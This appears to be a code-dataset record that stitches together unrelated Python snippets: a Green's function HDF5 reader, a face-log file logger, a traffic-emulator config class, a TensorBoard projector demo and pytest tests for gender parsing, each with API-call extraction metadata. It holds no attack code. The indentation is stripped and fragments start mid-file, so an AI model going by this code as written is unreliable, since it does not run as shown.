if attr in GreensfElement._fields:
return self.element._asdict()[attr]
raise AttributeError(f'{self.__class__.__name__!r} object has no attribute {attr!r}')
@staticmethod
def to_m_index(m):
"""
Convert between magnetic quantum numbers between -l and l
to 0 and 2l+1 for easier indexing
:param m: int magnetic quantum number to convert
:returns: converted magnetic quantum number
"""
if abs(m) > 3:
raise ValueError('Invalid magnetic quantum number (>3)')
return m + 3
@staticmethod
def to_spin_indices(spin):
"""
Convert between spin index (0 to 3) to the corresponding
two spin indices (0 or 1)
:param spin: int spin index to convert
:returns: tuple of spin indices
"""
if spin < 0 or spin > 3:
raise ValueError('Invalid spin index')
if spin < 2:
spin1 = spin
spin2 = spin
elif spin == 2:
spin1 = 1
spin2 = 0
else:
spin1 = 0
spin2 = 1
return spin1, spin2
@property
def nspins(self):
"""
Return the number of spins of the current element.
If mperp is True for the element it is 4 otherwise it
is determined by the spins attribute
"""
if self.mperp:
return 4
else:
return self.spins
def get_scalar_product_by_key(self, key, spin):
spin1, spin2 = self.to_spin_indices(spin)
return self.scalar_products[f'{key}n'][spin1, spin2]
def __str__(self):
"""
String representation of the :py:class:`GreensFunction`. Chosen to be the
str representation of the stored :py:class:`GreensfElement` instance.
"""
return str(self.element)
def energy_dependence(self, *, m=None, mp=None, spin, imag=True, both_contours=False):
"""
Select data with energy dependence
:param m: optional integer magnetic quantum number between -l and l
:param mp: optional integer magnetic quantum number between -lp and lp
:param spin: optional integer spin between 1 and nspins
:param both_contours: bool id True the data is not added for both energy contours
:param imag: bool if True and both_contours is False the imaginary part 1/2i(G(z)-G(z^*)) is returned
otherwise the real part 1/2(G(z)+G(z^*))
:returns: numpy array with the selected data
"""
if spin is not None:
spin -= 1
spin_index = min(spin, 2 if self.mperp else self.nspins - 1)
else:
spin_index = slice(0, min(3, self.nspins))
if m is not None:
m_index = self.to_m_index(m)
else:
m_index = slice(self.lmax - self.l, self.lmax + self.l + 1, 1)
if mp is not None:
mp_index = self.to_m_index(mp)
else:
mp_index = slice(self.lmax - self.l, self.lmax + self.lp + 1, 1)
gf = self.data['sphavg'][:, spin_index, mp_index, m_index, :].T
if both_contours:
return gf
else:
if imag:
data = -1 / (2 * np.pi * 1j) * (gf[..., 0] - gf[..., 1])
else:
data = -1 / (2 * np.pi) * (gf[..., 0] + gf[..., 1])
return data.real
def trace_energy_dependence(self, spin, imag=True):
"""
Select trace of data with energy dependence
:param spin: integer spin between 1 and nspins
:param imag: bool if True the imaginary part 1/2i(G(z)-G(z^*)) is returned
otherwise the real part 1/2(G(z)+G(z^*))
:returns: numpy array with the selected and traced over data
"""
if self.l != self.lp:
raise ValueError('Trace only supported for l==lp')
data = np.zeros(self.points.shape)
for m in range(-self.l, self.l + 1):
data += self.energy_dependence(m=m, mp=m, spin=spin, imag=imag)
return data
class colors:
"""
Color strings for coloring terminal output
You may need to change color settings in iPython
"""
red = '\033[31m'
endc = '\033[m'
green = '\033[32m'
def printElements(elements, index=None, mark=None):
"""
Print the given list of :py:class:`GreensfElement` in a nice table
:param elements: list of :py:class:`GreensfElement` to be printed
:param index: optional list of indices to show instead of the default index in the list
:param mark: optional list of int with elements to emphasize with an arrow and color
"""
print('Index | l | lp | atom | atomp | sphavg | onsite | iContour | atomDiff |')
print('-----------------------------------------------------------------------------------------')
if index is None:
elem_iter = enumerate(elements)
else:
elem_iter = zip(index, elements)
for elem_index, element in elem_iter:
if mark is not None and elem_index + 1 in mark:
markStr = '<---'
color = colors.green
else:
markStr = ''
color = ''
atomdiff_str = np.array2string(element.atomDiff,
precision=2,
separator=',',
suppress_small=True,
sign=' ',
floatmode='fixed')
print(
color +
f'{elem_index+1:<7d}|{element.l:7d}|{element.lp:7d}|{element.atomType:7d}|{element.atomTypep:7d}|{str(element.sphavg):>8s}|{str(element.onsite):>8s}|{element.contour:10d}|{atomdiff_str}|{markStr}'
+ colors.endc)
def listElements(hdffile, show=False):
"""
Find the green's function elements contained in the given ``greens.hdf`` file
:param hdffile: filepath or file handle to a greensf.hdf file
:param show: bool if True the found elements are printed in a table
:returns: list of :py:class:`GreensfElement`
"""
with h5py.File(hdffile, 'r') as h5_file:
group_name = _get_greensf_group_name(h5_file)
num_elements = h5_file.get(group_name).attrs['NumElements'][0]
elements = []
for index in range(1, num_elements + 1):
elements.append(_read_element_header(h5_file, index))
if show:
print(f'These Elements are found in {hdffile}:')
printElements(elements)
return elements
def selectOnsite(hdffile, l, atomType, lp=None, show=True):
"""
Find the specified onsite element in the ``greensf.hdf`` file
:param hdffile: filepath or file handle to a greensf.hdf file
:param l: integer of the orbital quantum number
:param atomType: integer of the atom type
:param lp: optional integer of the second orbital quantum number (default equal to l)
:param show: bool if True the found elements are printed in a table and the selected ones are marked
:returns: list of indexes in the ``greensf.hdf`` file corresponding to the selected criteria
"""
if lp is None:
lp = l
elements = listElements(hdffile)
foundIndices = []
for index, elem in enumerate(elements):
if elem.l != l:
continue
if elem.lp != lp:
continue
if elem.atomType != atomType:
continue
if elem.atomTypep != atomType:
continue
if np.linalg.norm(elem.atomDiff) > 1e-12:
continue
foundIndices.append(index + 1)
if show:
printElements(elements, mark=foundIndices)
return foundIndices
def intersite_shells(hdffile, refAtom, return_greensf=True, show=False):
"""
Construct the green's function pairs to calculate the Jij exchange constants
for a given reference atom from a given ``greensf.hdf`` file
:param hdffile: filepath or file handle to a greensf.hdf file
:param refAtom: integer of the atom to calculate the Jij's for (correspinds to the i)
:param return_greensf: bool, if True instead of the indices aiterator yielding the
green's functions directly for calculations
:param show: if True the elements belonging to a shell are printed in a shell
:returns: either list of tuples with distance and all indices of pairs in the shell
or flat iterator with distance and the two corresponding :py:class:`GreensFunction`
instances
"""
elements = listElements(hdffile)
distances = [round(np.linalg.norm(elem.atomDiff), 12) for elem in elements]
#sort the elements according to shells
index_sorted = sorted(range(len(elements)), key=lambda k: distances[k])
elements_sorted = [elements[index] for index in index_sorted]
jijPairs = []
for dist, shell in groupby(zip(index_sorted, elements_sorted), key=lambda k: distances[k[0]]):
if dist > 1e-12:
if show:
print(f'\nFound shell at distance: {dist}')
print('The following elements are present:')
shell_list = list(shell)
jijPairsShell = []
#Try to find gij gji pairs for Jij calculations
for indexij, elemij in shell_list:
for indexji, elemji in shell_list:
if elemij.contour != elemji.contour:
continue
if elemij.atomType != refAtom:
continue
if elemij.atomType != elemji.atomTypep:
continue
if elemij.atomTypep != elemji.atomType:
continue
if elemij.l != elemji.l:
continue
if elemij.lp != elemji.lp:
continue
if np.linalg.norm(elemij.atomDiff + elemji.atomDiff) > 1e-12:
continue
#here we have found a pair
#Plus 1 because the indexing starts at 1 in the hdf file
if (indexji + 1, indexij + 1) not in jijPairsShell or \
elemij.atomType == elemij.atomTypep:
jijPairsShell.append((indexij + 1, indexji + 1))
if len(jijPairsShell) > 0:
jijPairs.append((dist, jijPairsShell))
if show:
#print the elements in the shell
elem = [x[1] for x in shell_list]
index = [x[0] for x in shell_list]
printElements(elem, index=index)
def shell_iterator(shells):
for distance, pairs in shells:
for g1, g2 in pairs:
yield (distance,
GreensFunction.fromFile(hdffile, g1),\
GreensFunction.fromFile(hdffile, g2))
if return_greensf:
return shell_iterator(jijPairs)
else:
return jijPairs
|
[
"masci_tools.io.parsers.hdf5.reader.AttribTransformation",
"h5py.File",
"masci_tools.io.parsers.hdf5.HDF5Reader",
"masci_tools.io.parsers.hdf5.reader.Transformation",
"numpy.array2string",
"numpy.zeros",
"numpy.array",
"collections.namedtuple",
"numpy.linalg.norm"
] |
[((1342, 1462), 'collections.namedtuple', 'namedtuple', (['"""GreensfElement"""', "['l', 'lp', 'atomType', 'atomTypep', 'sphavg', 'onsite', 'contour', 'nLO',\n 'atomDiff']"], {}), "('GreensfElement', ['l', 'lp', 'atomType', 'atomTypep', 'sphavg',\n 'onsite', 'contour', 'nLO', 'atomDiff'])\n", (1352, 1462), False, 'from collections import namedtuple\n'), ((7957, 7992), 'numpy.array', 'np.array', (["element.attrs['atomDiff']"], {}), "(element.attrs['atomDiff'])\n", (7965, 7992), True, 'import numpy as np\n'), ((8704, 8720), 'masci_tools.io.parsers.hdf5.HDF5Reader', 'HDF5Reader', (['file'], {}), '(file)\n', (8714, 8720), False, 'from masci_tools.io.parsers.hdf5 import HDF5Reader\n'), ((14880, 14907), 'numpy.zeros', 'np.zeros', (['self.points.shape'], {}), '(self.points.shape)\n', (14888, 14907), True, 'import numpy as np\n'), ((16206, 16321), 'numpy.array2string', 'np.array2string', (['element.atomDiff'], {'precision': '(2)', 'separator': '""","""', 'suppress_small': '(True)', 'sign': '""" """', 'floatmode': '"""fixed"""'}), "(element.atomDiff, precision=2, separator=',',\n suppress_small=True, sign=' ', floatmode='fixed')\n", (16221, 16321), True, 'import numpy as np\n'), ((17121, 17144), 'h5py.File', 'h5py.File', (['hdffile', '"""r"""'], {}), "(hdffile, 'r')\n", (17130, 17144), False, 'import h5py\n'), ((5976, 6092), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_all_child_datasets"""', 'args': '()', 'kwargs': "{'ignore': ['scalarProducts', 'LOContribution']}"}), "(name='get_all_child_datasets', args=(), kwargs={'ignore': [\n 'scalarProducts', 'LOContribution']})\n", (5990, 6092), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((6155, 6222), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""convert_to_complex_array"""', 'args': '()', 'kwargs': '{}'}), "(name='convert_to_complex_array', args=(), kwargs={})\n", (6169, 6222), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((6236, 6310), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""multiply_scalar"""', 'args': '(1.0 / HTR_TO_EV,)', 'kwargs': '{}'}), "(name='multiply_scalar', args=(1.0 / HTR_TO_EV,), kwargs={})\n", (6250, 6310), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((6502, 6567), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_all_child_datasets"""', 'args': '()', 'kwargs': '{}'}), "(name='get_all_child_datasets', args=(), kwargs={})\n", (6516, 6567), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((6685, 6750), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_all_child_datasets"""', 'args': '()', 'kwargs': '{}'}), "(name='get_all_child_datasets', args=(), kwargs={})\n", (6699, 6750), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((18509, 18538), 'numpy.linalg.norm', 'np.linalg.norm', (['elem.atomDiff'], {}), '(elem.atomDiff)\n', (18523, 18538), True, 'import numpy as np\n'), ((19603, 19632), 'numpy.linalg.norm', 'np.linalg.norm', (['elem.atomDiff'], {}), '(elem.atomDiff)\n', (19617, 19632), True, 'import numpy as np\n'), ((2201, 2268), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""convert_to_complex_array"""', 'args': '()', 'kwargs': '{}'}), "(name='convert_to_complex_array', args=(), kwargs={})\n", (2215, 2268), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((2290, 2364), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""multiply_scalar"""', 'args': '(1.0 / HTR_TO_EV,)', 'kwargs': '{}'}), "(name='multiply_scalar', args=(1.0 / HTR_TO_EV,), kwargs={})\n", (2304, 2364), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((2575, 2642), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""convert_to_complex_array"""', 'args': '()', 'kwargs': '{}'}), "(name='convert_to_complex_array', args=(), kwargs={})\n", (2589, 2642), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((2664, 2779), 'masci_tools.io.parsers.hdf5.reader.AttribTransformation', 'AttribTransformation', ([], {'name': '"""shift_by_attribute"""', 'attrib_name': '"""fermi_energy"""', 'args': '()', 'kwargs': "{'negative': True}"}), "(name='shift_by_attribute', attrib_name='fermi_energy',\n args=(), kwargs={'negative': True})\n", (2684, 2779), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((3009, 3077), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""multiply_scalar"""', 'args': '(HTR_TO_EV,)', 'kwargs': '{}'}), "(name='multiply_scalar', args=(HTR_TO_EV,), kwargs={})\n", (3023, 3077), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((3294, 3361), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""convert_to_complex_array"""', 'args': '()', 'kwargs': '{}'}), "(name='convert_to_complex_array', args=(), kwargs={})\n", (3308, 3361), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((3383, 3451), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""multiply_scalar"""', 'args': '(HTR_TO_EV,)', 'kwargs': '{}'}), "(name='multiply_scalar', args=(HTR_TO_EV,), kwargs={})\n", (3397, 3451), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((3732, 3802), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_attribute"""', 'args': "('FermiEnergy',)", 'kwargs': '{}'}), "(name='get_attribute', args=('FermiEnergy',), kwargs={})\n", (3746, 3802), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((3824, 3884), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_first_element"""', 'args': '()', 'kwargs': '{}'}), "(name='get_first_element', args=(), kwargs={})\n", (3838, 3884), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((4113, 4177), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_attribute"""', 'args': "('spins',)", 'kwargs': '{}'}), "(name='get_attribute', args=('spins',), kwargs={})\n", (4127, 4177), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((4199, 4259), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_first_element"""', 'args': '()', 'kwargs': '{}'}), "(name='get_first_element', args=(), kwargs={})\n", (4213, 4259), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((4526, 4590), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_attribute"""', 'args': "('mperp',)", 'kwargs': '{}'}), "(name='get_attribute', args=('mperp',), kwargs={})\n", (4540, 4590), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((4612, 4672), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_first_element"""', 'args': '()', 'kwargs': '{}'}), "(name='get_first_element', args=(), kwargs={})\n", (4626, 4672), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((4694, 4766), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""apply_lambda"""', 'args': '(lambda x: x == 1,)', 'kwargs': '{}'}), "(name='apply_lambda', args=(lambda x: x == 1,), kwargs={})\n", (4708, 4766), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((5037, 5100), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_attribute"""', 'args': "('maxl',)", 'kwargs': '{}'}), "(name='get_attribute', args=('maxl',), kwargs={})\n", (5051, 5100), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((5122, 5182), 'masci_tools.io.parsers.hdf5.reader.Transformation', 'Transformation', ([], {'name': '"""get_first_element"""', 'args': '()', 'kwargs': '{}'}), "(name='get_first_element', args=(), kwargs={})\n", (5136, 5182), False, 'from masci_tools.io.parsers.hdf5.reader import Transformation, AttribTransformation\n'), ((20898, 20947), 'numpy.linalg.norm', 'np.linalg.norm', (['(elemij.atomDiff + elemji.atomDiff)'], {}), '(elemij.atomDiff + elemji.atomDiff)\n', (20912, 20947), True, 'import numpy as np\n')]
|
# logging times and names to a file for event parsing
import os
import time
from pathlib import Path
import csv
logPath = os.path.join(os.getcwd(), "face-log.txt")
FIELD_AMT = 2
class Logger(object):
# initialization function that creates the log file
def __init__(self):
path = Path(logPath)
if path.is_file():
print("Found previous log file")
file = open(logPath, "r")
first_line = file.readline()
if first_line is None or first_line == "":
print("[1] File is empty")
logFile = open(logPath, "w")
logFile.write("Event Time\tIdentity\n")
else:
# checking if the header is correct
logFile = open(logPath, "r")
reader = csv.reader(logFile, delimiter='\t')
row = next(reader)
if len(row) > 1:
if row[0] == "Event Time" and row[1] == "Identity":
print("File correctly formatted")
else:
print("[1] File has an incorrectly formatted first line")
print("Please fix the headers and run again")
else:
print("[2] File has an incorrectly formatted first line")
print("Please fix the headers and run again")
# TODO: check if the data within the file is formatted correctly w/ FIELD_AMT
# TODO: clean incorrectly formatted data
else:
print("No previous log file detected!")
print("Creating new log file")
# create new file w/ header
logFile = open(logPath, "w")
logFile.write("Event Time\tIdentity\n")
logFile.close()
def addLog(self, name, time):
if time is None or name is None:
print("[ERROR] no name or time to add to log file!")
else:
logFile = open(logPath, "a")
logFile.write(time + "\t" + name + "\n")
logFile.close()
print("Added log")
# parses through the log and returns time when person was last seen
def checkLastSeen(self, name):
logFile = open(logPath, "r")
reader = csv.reader(logFile, delimiter='\t')
lastSeen = ""
for rows in reader:
if rows[1] == name:
lastSeen = rows[0]
logFile.close()
return lastSeen
# testing our new logger
logger = Logger()
time = str(int(time.time()))
logger.addLog("blake_edwards", time)
print("blake_edwards last seen @: " + logger.checkLastSeen("blake_edwards"))
|
[
"os.getcwd",
"pathlib.Path",
"csv.reader",
"time.time"
] |
[((135, 146), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (144, 146), False, 'import os\n'), ((296, 309), 'pathlib.Path', 'Path', (['logPath'], {}), '(logPath)\n', (300, 309), False, 'from pathlib import Path\n'), ((2289, 2324), 'csv.reader', 'csv.reader', (['logFile'], {'delimiter': '"""\t"""'}), "(logFile, delimiter='\\t')\n", (2299, 2324), False, 'import csv\n'), ((2549, 2560), 'time.time', 'time.time', ([], {}), '()\n', (2558, 2560), False, 'import time\n'), ((800, 835), 'csv.reader', 'csv.reader', (['logFile'], {'delimiter': '"""\t"""'}), "(logFile, delimiter='\\t')\n", (810, 835), False, 'import csv\n')]
|
#**********************************************************************************************
# Traffic Emulator for Network Services
# Copyright 2020 VMware, Inc
# The BSD-2 license (the "License") set forth below applies to all parts of
# the Traffic Emulator for Network Services project. You may not use this file
# except in compliance with the License.
#
# BSD-2 License
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE
#**********************************************************************************************
from collections import defaultdict
class Singleton(type):
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
class TE(object):
__metaclass__ = Singleton
def __init__(self, daemon_ip, flask_port, redis_port, nginx_port, \
postgres_port, zmq_port, grafana_port, loglevel):
self.__daemon_ip = daemon_ip
self.__flask_port = flask_port
self.__nginx_port = nginx_port
self.__redis_port = redis_port
self.__postgres_port = postgres_port
self.__zmq_port = zmq_port
self.__grafana_port = grafana_port
self.__loglevel = loglevel
self.__te_dp_dict = {}
self.__resource_config = None
self.__session_config = None
self.__instance_profile_config = None
self.__client_cert_bundle = None
#Stats Collection Purpose
self.ses_time_stamps = defaultdict(list)
def add_ses_time_stamp(self, ses_tag, timestamp):
self.ses_time_stamps[ses_tag].append(timestamp)
def clear_ses_time_stamp(self):
self.ses_time_stamps.clear()
def get_daemon_ip(self):
return self.__daemon_ip
def get_flask_port(self):
return self.__flask_port
def get_nginx_port(self):
return self.__nginx_port
def get_redis_port(self):
return self.__redis_port
def get_postgres_port(self):
return self.__postgres_port
def get_zmq_port(self):
return self.__zmq_port
def get_grafana_port(self):
return self.__grafana_port
def get_loglevel(self):
return self.__loglevel
def set_te_dp(self, te_dp_dict):
self.__te_dp_dict = te_dp_dict
def unset_te_dp(self):
self.__te_dp_dict = {}
def get_te_dp(self):
return self.__te_dp_dict
def set_resource_config(self, resource_config):
self.__resource_config = resource_config
def unset_resource_config(self):
self.__resource_config = None
def get_resource_config(self):
return self.__resource_config
def set_session_config(self, session_config):
self.__session_config = session_config
def unset_session_config(self):
self.__session_config = None
def get_session_config(self):
return self.__session_config
def set_instance_profile_config(self, instance_profile_config):
self.__instance_profile_config = instance_profile_config
def unset_instance_profile_config(self):
self.__instance_profile_config = None
def get_instance_profile_config(self):
return self.__instance_profile_config
def set_client_cert_bundle(self, client_cert_bundle):
self.__client_cert_bundle = client_cert_bundle
def unset_client_cert_bundle(self):
self.__client_cert_bundle = None
def get_client_cert_bundle(self):
return self.__client_cert_bundle
|
[
"collections.defaultdict"
] |
[((2909, 2926), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (2920, 2926), False, 'from collections import defaultdict\n')]
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tensorflow as tf # Requires Tensorflow >=2.1
from tensorboard.plugins import projector
import tensorflow_datasets as tfds
# This demo expands upon the word embeddings tutorial found
# here: https://www.tensorflow.org/tutorials/text/word_embeddings)
# and is intended to demonstrate the use of the embedding projector.
LOG_DIR = os.getenv("LOGDIR") or "/tmp/projector_demo" # Tensorboard log dir
METADATA_FNAME = "meta.tsv" # Labels will be stored here
STEP = 0
# Load imdb reviews dataset
(train_data, test_data), info = tfds.load(
"imdb_reviews/subwords8k",
split=(tfds.Split.TRAIN, tfds.Split.TEST),
with_info=True,
as_supervised=True,
)
encoder = info.features["text"].encoder
# shuffle, pad, and train the data.
train_batches = train_data.shuffle(1000).padded_batch(10, padded_shapes=((None,), ()))
test_batches = test_data.shuffle(1000).padded_batch(10, padded_shapes=((None,), ()))
train_batch, train_labels = next(iter(train_batches))
embedding_dim = 16
# Create a basic embedding layer
embedding = tf.keras.layers.Embedding(encoder.vocab_size, embedding_dim)
model = tf.keras.Sequential(
[
embedding,
tf.keras.layers.GlobalAveragePooling1D(),
tf.keras.layers.Dense(16, activation="relu"),
tf.keras.layers.Dense(1),
]
)
# Compile model
model.compile(
optimizer="adam",
loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),
metrics=["accuracy"],
)
# Train model
history = model.fit(
train_batches, epochs=1, validation_data=test_batches, validation_steps=20
)
# Fetch the embedding layer and get the weights.
# Make sure to remove the first element, as it is padding.
weights = tf.Variable(model.layers[0].get_weights()[0][1:])
def register_embedding(weights, labels, log_dir) -> None:
"""Saves a metadata file (labels) and a checkpoint (derived from weights)
and configures the Embedding Projector to read from the appropriate locations.
Args:
weights: tf.Variable with the weights of the embedding layer to be displayed.
labels: list of labels corresponding to the weights.
logdir: Directory into which to store the config file, as a `str`.
"""
# Create a checkpoint from embedding, the filename and key are
# name of the tensor.
checkpoint = tf.train.Checkpoint(embedding=weights)
checkpoint.save(os.path.join(LOG_DIR, "embedding.ckpt"))
# Save Labels separately on a line-by-line manner.
with open(os.path.join(log_dir, METADATA_FNAME), "w") as f:
for label in labels:
f.write("{}\n".format(label))
# Set up config
config = projector.ProjectorConfig()
embedding = config.embeddings.add()
# The name of the tensor will be suffixed by `/.ATTRIBUTES/VARIABLE_VALUE`
embedding.tensor_name = "embedding/.ATTRIBUTES/VARIABLE_VALUE"
embedding.metadata_path = METADATA_FNAME
projector.visualize_embeddings(log_dir, config)
# Save Files
register_embedding(weights, encoder.subwords, LOG_DIR)
|
[
"tensorboard.plugins.projector.visualize_embeddings",
"tensorflow_datasets.load",
"tensorflow.train.Checkpoint",
"tensorflow.keras.layers.Dense",
"tensorflow.keras.losses.BinaryCrossentropy",
"tensorboard.plugins.projector.ProjectorConfig",
"tensorflow.keras.layers.GlobalAveragePooling1D",
"tensorflow.keras.layers.Embedding",
"os.path.join",
"os.getenv"
] |
[((1344, 1464), 'tensorflow_datasets.load', 'tfds.load', (['"""imdb_reviews/subwords8k"""'], {'split': '(tfds.Split.TRAIN, tfds.Split.TEST)', 'with_info': '(True)', 'as_supervised': '(True)'}), "('imdb_reviews/subwords8k', split=(tfds.Split.TRAIN, tfds.Split.\n TEST), with_info=True, as_supervised=True)\n", (1353, 1464), True, 'import tensorflow_datasets as tfds\n'), ((1847, 1907), 'tensorflow.keras.layers.Embedding', 'tf.keras.layers.Embedding', (['encoder.vocab_size', 'embedding_dim'], {}), '(encoder.vocab_size, embedding_dim)\n', (1872, 1907), True, 'import tensorflow as tf\n'), ((1148, 1167), 'os.getenv', 'os.getenv', (['"""LOGDIR"""'], {}), "('LOGDIR')\n", (1157, 1167), False, 'import os\n'), ((3106, 3144), 'tensorflow.train.Checkpoint', 'tf.train.Checkpoint', ([], {'embedding': 'weights'}), '(embedding=weights)\n', (3125, 3144), True, 'import tensorflow as tf\n'), ((3431, 3458), 'tensorboard.plugins.projector.ProjectorConfig', 'projector.ProjectorConfig', ([], {}), '()\n', (3456, 3458), False, 'from tensorboard.plugins import projector\n'), ((3694, 3741), 'tensorboard.plugins.projector.visualize_embeddings', 'projector.visualize_embeddings', (['log_dir', 'config'], {}), '(log_dir, config)\n', (3724, 3741), False, 'from tensorboard.plugins import projector\n'), ((1970, 2010), 'tensorflow.keras.layers.GlobalAveragePooling1D', 'tf.keras.layers.GlobalAveragePooling1D', ([], {}), '()\n', (2008, 2010), True, 'import tensorflow as tf\n'), ((2020, 2064), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(16)'], {'activation': '"""relu"""'}), "(16, activation='relu')\n", (2041, 2064), True, 'import tensorflow as tf\n'), ((2074, 2098), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(1)'], {}), '(1)\n', (2095, 2098), True, 'import tensorflow as tf\n'), ((2171, 2223), 'tensorflow.keras.losses.BinaryCrossentropy', 'tf.keras.losses.BinaryCrossentropy', ([], {'from_logits': '(True)'}), '(from_logits=True)\n', (2205, 2223), True, 'import tensorflow as tf\n'), ((3165, 3204), 'os.path.join', 'os.path.join', (['LOG_DIR', '"""embedding.ckpt"""'], {}), "(LOG_DIR, 'embedding.ckpt')\n", (3177, 3204), False, 'import os\n'), ((3276, 3313), 'os.path.join', 'os.path.join', (['log_dir', 'METADATA_FNAME'], {}), '(log_dir, METADATA_FNAME)\n', (3288, 3313), False, 'import os\n')]
|
# -*- coding: utf-8 -*-
#
# Copyright © 2021–2022 <NAME> <<EMAIL>>
# Released under the MIT Licence
#
import pytest
from pytcnz.gender import Gender, InvalidGenderError
@pytest.fixture(
params=[
"M",
"W",
"Man",
"Men",
"Women",
"Woman",
"male",
"female",
None,
"NONE",
"N",
"w",
"m",
"f",
]
)
def valid_gender(request):
return request.param
def test_valid_genders(valid_gender):
Gender.from_string(valid_gender)
@pytest.fixture(params=[1, "X", True, "bar"])
def invalid_gender(request):
return request.param
def test_invalid_genders(invalid_gender):
with pytest.raises(InvalidGenderError):
Gender.from_string(invalid_gender)
@pytest.fixture(
params=[(Gender.M, "Male"), (Gender.W, "Female"), (Gender.N, "None")]
)
def gender_sex_pair(request):
return request.param
def test_gender_to_sex_conversion(gender_sex_pair):
assert Gender.to_sex(gender_sex_pair[0]) == gender_sex_pair[1]
|
[
"pytest.raises",
"pytcnz.gender.Gender.to_sex",
"pytcnz.gender.Gender.from_string",
"pytest.fixture"
] |
